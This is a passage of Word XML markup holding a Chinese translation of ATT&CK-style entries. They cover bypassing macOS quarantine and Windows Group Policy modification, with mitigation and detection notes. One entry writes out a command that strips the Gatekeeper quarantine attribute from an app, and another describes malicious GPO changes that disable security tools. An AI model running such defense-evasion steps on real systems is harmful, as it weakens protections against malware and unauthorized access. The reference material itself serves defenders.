      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检查。类似地，如果有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问权限或提升的权限，也可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xattr</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来删除此属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1994F57B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在典型操作中，文件将从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载，并在保存到磁盘之前打上隔离标志。当用户试图打开文件或应用时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的关守将介入并检查是否存在此标志。如果存在此</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>标志</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会提示用户确认运行程序，甚至会给出应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但是，这一切的前提</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是文件是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>智能隔离</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A3E5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="62A8C415" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="72571E9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="133E9362" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="17FBBDD9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F773D48" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C76E354" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置系统设置来阻止运行非通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apple Store</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>下载的应用，这有助于减少一些问题的发生。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FAEE761" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63EF3AE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3480B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控用户而非操作系统删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>com.apple.quarantine</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是可疑操作，应进一步检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DFBA91" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组策略修改</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="3BAEECD2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D052E28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0099362D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve"> T1484</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC89A70" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD96F5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0099362D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C9210DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0099362D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9DAC1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0099362D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE035AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统访问控制</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件系统访问控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D779AE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0099362D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0099362D">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t>: Itamar Mizrahi; Tristan Bennett, Seamless Intelligence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407DF864" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0099362D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0099362D">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40BFFB9F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2024D99B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FE6CC4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会修改组策略对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPO</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以颠覆域的预期任意访问控制，通常目的是提升域上的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCD6CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FE6CC4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>组策略允许在活动目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中集中管理用户和计算机设置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是组策略设置的容器，由存储在可预测网络路径中的文件组成</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> [&lt;DOMAIN&gt;[SYSVOL]&lt;DOMAIN&gt;[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>策略</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788E82A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FE6CC4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中的其他对象一样，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>具有与其关联的访问控制。默认情况下，域中的所有用户帐户都有权读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。可以将</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>访问控制权限（例如写入访问权限）委派给域中的特定用户或组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F527F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>修改可用于实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用安全工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程文件复制</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建帐户</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CB7A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
